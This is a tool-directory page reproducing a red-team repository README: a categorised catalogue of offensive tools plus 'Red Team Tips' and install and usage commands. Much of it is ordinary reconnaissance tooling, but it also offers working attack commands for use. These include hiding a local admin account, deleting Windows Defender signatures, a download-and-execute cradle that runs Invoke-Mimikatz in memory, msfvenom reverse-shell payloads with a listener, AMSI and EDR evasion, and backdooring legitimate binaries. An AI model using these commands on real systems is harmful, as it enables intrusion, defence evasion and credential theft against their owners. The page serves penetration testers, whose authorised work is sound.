Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Hack Tools — Project that brings together several pentest tools | Kitploit
Tools/GitLabGitLab/edu0x01/hack-tools
Defensive ToolsPhishing ToolsPrivilege EscalationReconnaissanceExploit FrameworksLateral MovementPenetration TestingCommand and ControlLearning & EducationRed TeamingCurated ResourcesPayload Development
22 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitLabedu0x01/hack-tools

Hack Tools

Project that brings together several pentest tools

View RepositoryWebsite

Hack Tools

This repository contains a collection of 200+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

Warning

The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.

Note

Hide Tool List headings with the arrow.

Click 🔙 to get back to the list.

Command to clone

root@kitploit:~
git submodule update --init --recursive

Add new project

root@kitploit:~
git submodule add https://github.com/example.git

docs: https://git-scm.com/book/en/v2/Git-Tools-Submodules

Tool List

Red Team Tips $\textcolor{gray}{\text{13 tips}}$
    • Hiding the local admin account @Alh4zr3d
    • Cripple windows defender by deleting signatures @Alh4zr3d
    • Enable multiple RDP sessions per user @Alh4zr3d
    • Sysinternals PsExec.exe local alternative @GuhnooPlusLinux
    • Live off the land port scanner @Alh4zr3d
    • Proxy aware PowerShell DownloadString @Alh4zr3d
    • Looking for internal endpoints in browser bookmarks @Alh4zr3d
    • Query DNS records for enumeration @Alh4zr3d
    • Unquoted service paths without PowerUp @Alh4zr3d
    • Bypass a disabled command prompt with /k Martin Sohn Christensen
    • Stop windows defender deleting mimikatz.exe @GuhnooPlusLinux
    • Check if you are in a virtual machine @dmcxblue
    • Enumerate AppLocker rules @Alh4zr3d
Reconnaissance $\textcolor{gray}{\text{20 tools}}$
    • crt.sh -> httprobe -> EyeWitness Automated domain screenshotting
    • jsendpoints Extract page DOM links
    • nuclei Vulnerability scanner
    • certSniff Certificate transparency log keyword sniffer
    • gobuster Website path brute force
    • feroxbuster Fast content discovery tool written in Rust
    • CloudBrute Cloud infrastructure brute force
    • dnsrecon Enumerate DNS records
    • Shodan.io Public facing system knowledge base
    • AORT (All in One Recon Tool) Subdomain enumeration
    • spoofcheck SPF/DMARC record checker
    • AWSBucketDump S3 bucket enumeration
    • GitHarvester GitHub credential searcher
    • truffleHog GitHub credential scanner
    • Dismap Asset discovery/identification
    • enum4linux Windows/samba enumeration
    • skanuvaty Dangerously fast dns/network/port scanner
    • Metabigor OSINT tool without API
    • Gitrob GitHub sensitive information scanner
    • gowitness Web screenshot utility using Chrome Headless
Resource Development $\textcolor{gray}{\text{8 tools}}$
    • Chimera PowerShell obfuscation
    • msfvenom Payload creation
    • Shellter Dynamic shellcode injection tool
    • Freeze Payload creation (circumventing EDR)
    • WordSteal Steal NTML hashes with Microsoft Word
    • WSH Wsh payload
    • HTA Hta payload
    • VBA Vba payload
Initial Access $\textcolor{gray}{\text{6 tools}}$
    • Bash Bunny USB attack tool
    • EvilGoPhish Phishing campaign framework
    • The Social-Engineer Toolkit Phishing campaign framework
    • Hydra Brute force tool
    • SquarePhish OAuth/QR code phishing framework
    • King Phisher Phishing campaign framework
Execution $\textcolor{gray}{\text{12 tools}}$
    • Responder LLMNR, NBT-NS and MDNS poisoner
    • secretsdump Remote hash dumper
    • evil-winrm WinRM shell
    • Donut In-memory .NET execution
    • Macro_pack Macro obfuscation
    • PowerSploit PowerShell script suite
    • Rubeus Active directory hack tool
    • SharpUp Windows vulnerability identifier
    • SQLRecon Offensive MS-SQL toolkit
    • UltimateAppLockerByPassList Common AppLocker Bypass Techniques
    • StarFighters JavaScript and VBScript Based Empire Launcher
    • demiguise HTA encryption toola
Persistence $\textcolor{gray}{\text{4 tools}}$
    • Impacket Python script suite
    • Empire Post-exploitation framework
    • SharPersist Windows persistence toolkit
    • ligolo-ng Tunneling tool that uses a TUN interface
Privilege Escalation $\textcolor{gray}{\text{9 tools}}$
    • LinPEAS Linux privilege escalation
    • WinPEAS Windows privilege escalation
    • linux-smart-enumeration Linux privilege escalation
    • Certify Active directory privilege escalation
    • Get-GPPPassword Windows password extraction
    • Sherlock PowerShell privilege escalation tool
    • Watson Windows privilege escalation tool
    • ImpulsiveDLLHijack DLL Hijack tool
    • ADFSDump AD FS dump tool
Defense Evasion $\textcolor{gray}{\text{5 tools}}$
    • Invoke-Obfuscation Script obfuscator
    • Veil Metasploit payload obfuscator
    • SharpBlock EDR bypass via entry point execution prevention
    • Alcatraz GUI x64 binary obfuscator
    • Mangle Compiled executable manipulation
    • AMSI Fail PowerShell snippets that break or disable AMSI
Credential Access $\textcolor{gray}{\text{9 tools}}$
    • Mimikatz Windows credential extractor
    • LaZagne Local password extractor
    • hashcat Password hash cracking
    • John the Ripper Password hash cracking
    • SCOMDecrypt SCOM Credential Decryption Tool
    • nanodump LSASS process minidump creation
    • eviltree Tree remake for credential discovery
    • SeeYouCM-Thief Cisco phone systems configuration file parsing
    • MailSniper Microsoft Exchange Mail Searcher
Discovery $\textcolor{gray}{\text{6 tools}}$
    • PCredz Credential discovery PCAP/live interface
    • PingCastle Active directory assessor
    • Seatbelt Local vulnerability scanner
    • ADRecon Active directory recon
    • adidnsdump Active Directory Integrated DNS dumping
    • scavenger Scanning tool for scavenging systems
Lateral Movement $\textcolor{gray}{\text{12 tools}}$
    • crackmapexec Windows/Active directory lateral movement toolkit
    • WMIOps WMI remote commands
    • PowerLessShell Remote PowerShell without PowerShell
    • PsExec Light-weight telnet-replacement
    • LiquidSnake Fileless lateral movement
    • Enabling RDP Windows RDP enable command
    • Upgrading shell to meterpreter Reverse shell improvement
    • Forwarding Ports Local port forward command
    • Jenkins reverse shell Jenkins shell command
    • ADFSpoof Forge AD FS security tokens
    • kerbrute A tool to perform Kerberos pre-auth bruteforcing
    • Coercer Coerce a Windows server to authenticate
Collection $\textcolor{gray}{\text{3 tools}}$
    • BloodHound Active directory visualisation
    • Snaffler Active directory credential collector
    • linWinPwn Active Directory Enumeration and Vulnerability checks
Command and Control $\textcolor{gray}{\text{6 tools}}$
    • Havoc Command and control framework
    • Covenant Command and control framework (.NET)
    • Merlin Command and control framework (Golang)
    • Metasploit Framework Command and control framework (Ruby)
    • Pupy Command and control framework (Python)
    • Brute Ratel Command and control framework ($$$)
Exfiltration $\textcolor{gray}{\text{5 tools}}$
    • Dnscat2 C2 via DNS tunneling
    • Cloakify Data transformation for exfiltration
    • PyExfil Data exfiltration PoC
    • Powershell RAT Python based backdoor
    • GD-Thief Google drive exfiltration
Impact $\textcolor{gray}{\text{3 tools}}$
    • Conti Pentester Guide Leak Conti ransomware group affilate toolkit
    • SlowLoris Simple denial of service
    • usbkill Anti-forensic kill-switch

Red Team Tips

Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.

Note: Nearly all tips are currently from @Alh4zr3d, he posts good Red Team Tips!

🔙Hiding the local admin account

root@kitploit:~
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f

Description: 'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'

Credit: @Alh4zr3d

Link: Twitter

🔙Cripple windows defender by deleting signatures

root@kitploit:~
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Description: 'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'

Credit: @Alh4zr3d

Link: Twitter

🔙Enable multiple RDP sessions per user

root@kitploit:~
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f

Description: 'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'

Credit: @Alh4zr3d

Link: Twitter

🔙Sysinternals PsExec.exe local alternative

root@kitploit:~
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "

Description: 'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Live off the land port scanner

root@kitploit:~
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null

Description: 'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'

Credit: @Alh4zr3d

Link: Twitter

🔙Proxy aware PowerShell DownloadString

root@kitploit:~
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")

Description: 'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'

Credit: @Alh4zr3d

Link: Twitter

🔙Looking for internal endpoints in browser bookmarks

root@kitploit:~
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"

Description: 'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'

Credit: @Alh4zr3d

Link: Twitter

🔙Query DNS records for enumeration

root@kitploit:~
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>

Description: 'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'

Credit: @Alh4zr3d

Link: Twitter

🔙Unquoted service paths without PowerUp

root@kitploit:~
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Description: 'Finding unquoted service paths without PowerUp'

Credit: @Alh4zr3d

Link: Twitter

🔙Bypass a disabled command prompt with /k

root@kitploit:~
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Description: 'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.

Credit: Martin Sohn Christensen

Link: Blog

🔙Stop windows defender deleting mimikatz.exe

root@kitploit:~
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv

Description: 'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'

Credit: @GuhnooPlusLinux

Link: Twitter

🔙Check if you are in a virtual machine

root@kitploit:~
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"

Description: 'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'

Credit: @dmcxblue

Link: Twitter

🔙Enumerate AppLocker rules

root@kitploit:~
(Get-AppLockerPolicy -Local).RuleCollections

Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

Description: 'AppLocker can be a pain. Enumerate to see how painful'

Credit: @Alh4zr3d

Link: Twitter

Reconnaissance

🔙crt.sh -> httprobe -> EyeWitness

I have put together a bash one-liner that:

  • Passively collects a list of subdomains from certificate associations (crt.sh)
  • Actively requests each subdomain to verify it's existence (httprobe)
  • Actively screenshots each subdomain for manual review (EyeWitness)

Usage:

root@kitploit:~
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains

image

image

🔙jsendpoints

A JavaScript bookmarklet for extracting all webpage endpoint links on a page.

Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.

root@kitploit:~
javascript: (function () {
  var scripts = document.getElementsByTagName("script"),
    regex = /(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;
  const results = new Set();
  for (var i = 0; i < scripts.length; i++) {
    var t = scripts[i].src;
    "" != t &&
      fetch(t)
        .then(function (t) {
          return t.text();
        })
        .then(function (t) {
          var e = t.matchAll(regex);
          for (let r of e) results.add(r[0]);
        })
        .catch(function (t) {
          console.log("An error occurred: ", t);
        });
  }
  var pageContent = document.documentElement.outerHTML,
    matches = pageContent.matchAll(regex);
  for (const match of matches) results.add(match[0]);
  function writeResults() {
    results.forEach(function (t) {
      document.write(t + "<br>");
    });
  }
  setTimeout(writeResults, 3e3);
})();

Usage (Bookmarklet)

Create a bookmarklet...

  • Right click your bookmark bar
  • Click 'Add Page'
  • Paste the above Javascript in the 'url' box
  • Click 'Save'

...then visit the victim page in the browser and click the bookmarklet.

image

Usage (Console)

Paste the above Javascript into the console window F12 and press enter.

image

🔙nuclei

Fast vulnerability scanner that uses .yaml templates to search for specific issues.

Install:

root@kitploit:~
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Usage:

root@kitploit:~
cat domains.txt | nuclei -t /PATH/nuclei-templates/

image

🔙nuclei-templates

Nuclei Templates

Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.

Documentation • Contributions • Discussion • Community • FAQs • Join DC


Templates are the core of the nuclei scanner which powers the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community. We hope that you also contribute by sending templates via pull requests or Github issues to grow the list.

Nuclei Templates overview

An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is available here, and also available in JSON format for integration.

📖 Documentation

Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new or your own custom templates. We have also added a set of templates to help you understand how things work.

💪 Contributions

Nuclei-templates is powered by major contributions from the community. Template contributions , Feature Requests and Bug Reports are more than welcome.

Alt

💬 Discussion

Have questions / doubts / ideas to discuss? Feel free to open a discussion on Github discussions board.

👨‍💻 Community

You are welcome to join the active Discord Community to discuss directly with project maintainers and share things with others around security and automation. Additionally, you may follow us on Twitter to be updated on all the things about Nuclei.

Thanks again for your contribution and keeping this community vibrant. ❤️

🔙certSniff

certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.

You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.

Install:

root@kitploit:~
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Usage:

root@kitploit:~
python3 certSniff.py -f example.txt

image

🔙gobuster

Nice tool for brute forcing file/folder paths on a victim website.

Install:

root@kitploit:~
sudo apt install gobuster

Usage:

root@kitploit:~
gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20

image

🔙feroxbuster

A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...

Install: (Kali)

root@kitploit:~
sudo apt update && sudo apt install -y feroxbuster

Install: (Mac)

root@kitploit:~
curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash

Install: (Windows)

root@kitploit:~
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V

For full installation instructions see here.

Usage:

root@kitploit:~
# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx

# Scan with headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"

# Read URLs from stdin
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

# Proxy requests through burpsuite
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080

Full usage examples can be found here.

image

Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif

🔙CloudBrute

A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).

Features:

  • Cloud detection (IPINFO API and Source Code)
  • Fast (concurrent)
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Install:

Download the latest release for your system and follow the usage.

Usage:

root@kitploit:~
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

image

Image used from https://github.com/0xsha/CloudBrute

🔙dnsrecon

dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.

Install:

root@kitploit:~
sudo apt install dnsrecon

Usage:

root@kitploit:~
dnsrecon -d google.com

image

🔙shodan.io

Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan.

image

🔙AORT

Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.

Install:

root@kitploit:~
git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

Usage:

root@kitploit:~
python3 AORT.py -d google.com

image

🔙spoofcheck

A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.

Domains are spoofable if any of the following conditions are met:

  • Lack of an SPF or DMARC record
  • SPF record never specifies ~all or -all
  • DMARC policy is set to p=none or is nonexistent

Install:

root@kitploit:~
git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

Usage:

root@kitploit:~
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.

Install:

root@kitploit:~
git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

Usage:

root@kitploit:~
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.

Install:

root@kitploit:~
git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

Usage:

root@kitploit:~
./githarvester.py

🔙truffleHog

TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.

Install (Binaries): Link

Install (Go):

root@kitploit:~
git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

Usage:

root@kitploit:~
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.

Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.

Install:

Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:

root@kitploit:~
# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h

# Windows
dismap-0.3-windows-amd64.exe -h

Usage:

root@kitploit:~
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Image used from https://github.com/zhzyker/dismap

🔙enum4linux

A tool for enumerating information from Windows and Samba systems.

It can be used to gather a wide range of information, including:

  • Domain and domain controller information
  • Local user and group information
  • Shares and share permissions
  • Security policies
  • Active Directory information

Install: (Apt)

root@kitploit:~
sudo apt install enum4linux

Install: (Git)

root@kitploit:~
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Usage:

root@kitploit:~
# 'Do everything'
enum4linux.pl -a 192.168.2.55

# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55

# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55

# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55

# Verbose scan
enum4linux.pl -v 192.168.2.55

Full usage information can be found in this blog.

image

Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/

🔙skanuvaty

Dangerously fast dns/network/port scanner, created by Esc4iCEscEsc, written in rust.

You will need a subdomains file. E.g. Subdomain wordlist by Sublist3r.

Install:

Download the latest release from here.

root@kitploit:~
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Usage:

root@kitploit:~
skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

image

Image used from https://github.com/Esc4iCEscEsc/skanuvaty

🔙Metabigor

Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key.

Main Features:

  • Searching information about IP Address, ASN and Organization.
  • Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR.
  • Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
  • Get Summary about IP address (powered by @thebl4ckturtle)

Install:

root@kitploit:~
go install github.com/j3ssie/metabigor@latest

Usage:

root@kitploit:~
# discovery IP of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt

# Getting more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

# Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt

# Reverse Whois to find related domains
echo 'example.com' | metabigor related -s 'whois'

# Get Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'

image

Image used from https://github.com/j3ssie/metabigor

🔙Gitrob

Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github.

Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.

The findings will be presented through a web interface for easy browsing and analysis.

Note: Gitrob will need a Github access token in order to interact with the Github API. Create a personal access token and save it in an environment variable in your .bashrc or similar shell configuration file:

root@kitploit:~
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Install: (Go)

root@kitploit:~
go get github.com/michenriksen/gitrob

Install: (Binary)

A precompiled version is available for each release.

Usage:

root@kitploit:~
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Image used from https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.

Install: (Go)

root@kitploit:~
go install github.com/sensepost/gowitness@latest

Full installation information can be found here.

Usage:

root@kitploit:~
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Full usage information can be found here.

image

Image used from https://github.com/sensepost/gowitness

Resource Development

🔙Chimera

Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Install:

root@kitploit:~
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Usage:

root@kitploit:~
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.

Set Up Listener

root@kitploit:~
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run

Msfvenom Commands

PHP:

root@kitploit:~
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:

root@kitploit:~
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:

root@kitploit:~
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA:

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Full README information can be found here.

Install: (Kali)

root@kitploit:~
apt-get update
apt-get install shellter

Install: (Windows)

Visit the download page and install.

Usage:

Just pick a legit binary to backdoor and run Shellter.

Some nice tips can be found here.

Lots of community usage demos can be found here.

image

Image used from https://www.kali.org/tools/shellter/images/shellter.png

🔙Freeze

Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.

Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.

Install:

root@kitploit:~
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Usage:

root@kitploit:~
  -I string
        Path to the raw 64-bit shellcode.
  -O string
        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string
        For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string
        The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
  -sandbox
        Enables sandbox evasion by checking:
                Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)

image

Image used from https://www.blackhatethicalhacking.com/tools/freeze/

🔙WordSteal

This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.

Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.

Install:

root@kitploit:~
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Usage:

root@kitploit:~
# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1

# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0\n

image

Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/


🔙Freeze.rs

If you want to learn more about the techniques utilized in this framework, please take a look at SourceZero Blog and the original tool.

Description:

Freeze.rs is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze.rs utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.

Creating A Suspended Process:

When a process is created, Ntdll.dll is the first DLL that is loaded; this happens before any EDR DLLs are loaded. This means that there is a bit of a delay before an EDR can be loaded and start hooking and modifying the assembly of system DLLs. In looking at Windows syscalls in Ntdll.dll, we can see that nothing is hooked yet. If we create a process in a suspend state (one that is frozen in time), we can see that no other DLLs are loaded, except for Ntdll.dll. You can also see that no EDR DLLs are loaded, meaning that the syscalls located in Ntdll.dll are unmodified.

image

Address Space Layout Randomization

